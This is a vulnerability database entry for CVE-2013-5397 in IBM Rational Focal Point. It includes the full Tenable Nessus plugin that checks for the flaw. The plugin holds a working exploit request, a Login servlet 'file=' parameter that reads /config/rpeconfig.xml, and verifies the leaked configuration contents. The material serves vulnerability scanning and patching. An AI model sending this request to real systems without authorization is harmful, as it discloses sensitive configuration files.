Vulnerabilities > CVE-2013-5397 - Information Disclosure vulnerability in IBM Rational Focal Point Webservice Axis Gateway

047910
CVSS 3.3 - LOW
Attack vector
ADJACENT_NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
low complexity
ibm
nessus

Summary

Unspecified vulnerability in the Webservice Axis Gateway in IBM Rational Focal Point 6.4 before devfix1, 6.4.1.3 before devfix1, 6.5.1 before devfix1, 6.5.2 before devfix4, 6.5.2.3 before devfix9, 6.6 before devfix5, 6.6.0.1 before devfix2, and 6.6.1 allows remote attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, a different vulnerability than CVE-2013-5398.

Nessus

NASL familyCGI abuses
NASL idIBM_RATIONAL_FOCALPOINT_LOGIN_FILE_DISCLOSURE.NASL
descriptionNessus was able to exploit a file disclosure vulnerability in the Login servlet on the remote IBM Focal Point install. A remote attacker could potentially use this vulnerability to view sensitive files (such as configuration files).
last seen2020-06-01
modified2020-06-02
plugin id72861
published2014-03-06
reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/72861
titleIBM Rational Focal Point Login Servlet File Disclosure
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(72861);
  script_version("1.5");
  script_cvs_date("Date: 2019/11/26");

  script_cve_id("CVE-2013-5397");
  script_bugtraq_id(64338);

  script_name(english:"IBM Rational Focal Point Login Servlet File Disclosure");
  script_summary(english:"Tries to exploit file disclosure vulnerability");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is affected by a file disclosure vulnerability.");
  script_set_attribute(attribute:"description", value:
"Nessus was able to exploit a file disclosure vulnerability in the Login
servlet on the remote IBM Focal Point install.  A remote attacker could
potentially use this vulnerability to view sensitive files (such as
configuration files).");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-13-284/");
  script_set_attribute(attribute:"see_also", value:"http://www-01.ibm.com/support/docview.wss?uid=swg21654471");
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate patch per the referenced vendor advisory.");
  script_set_cvss_base_vector("CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2013-5397");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2013/12/13");
  script_set_attribute(attribute:"patch_publication_date", value:"2013/12/13");
  script_set_attribute(attribute:"plugin_publication_date", value:"2014/03/06");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:rational_focal_point");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("ibm_rational_focalpoint_login_detect.nbin");
  script_require_keys("www/ibm_rational_focal_point");
  script_require_ports("Services/www", 9080);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("webapp_func.inc");

port = get_http_port(default:9080);

install = get_install_from_kb(
  appname      : "ibm_rational_focal_point",
  port         : port,
  exit_on_fail : TRUE
);

dir = install['dir'];

exploit = dir + "/fp/servlet/Login?file=/config/rpeconfig.xml";

res = http_send_recv3(
  port            : port,
  method          : 'GET',
  item            : exploit,
  exit_on_fail    : TRUE
);

if (
  "<?xml" >< res[2] && "<config>" >< res[2] &&
  "IBM Corporation" >< res[2] && '<feature tag="Load">' >< res[2]
)
{
  if (report_verbosity > 0)
  {
    header = 'Nessus was able to verify the vulnerability using the following URL';

    report = get_vuln_report(
      items   : exploit,
      port    : port,
      header  : header
    );

    security_note(port:port, extra:report);
  }
  else security_note(port);
  exit(0);
}
else audit(AUDIT_WEB_APP_NOT_AFFECTED, "IBM Rational Focal Point", build_url(port:port, qs:dir));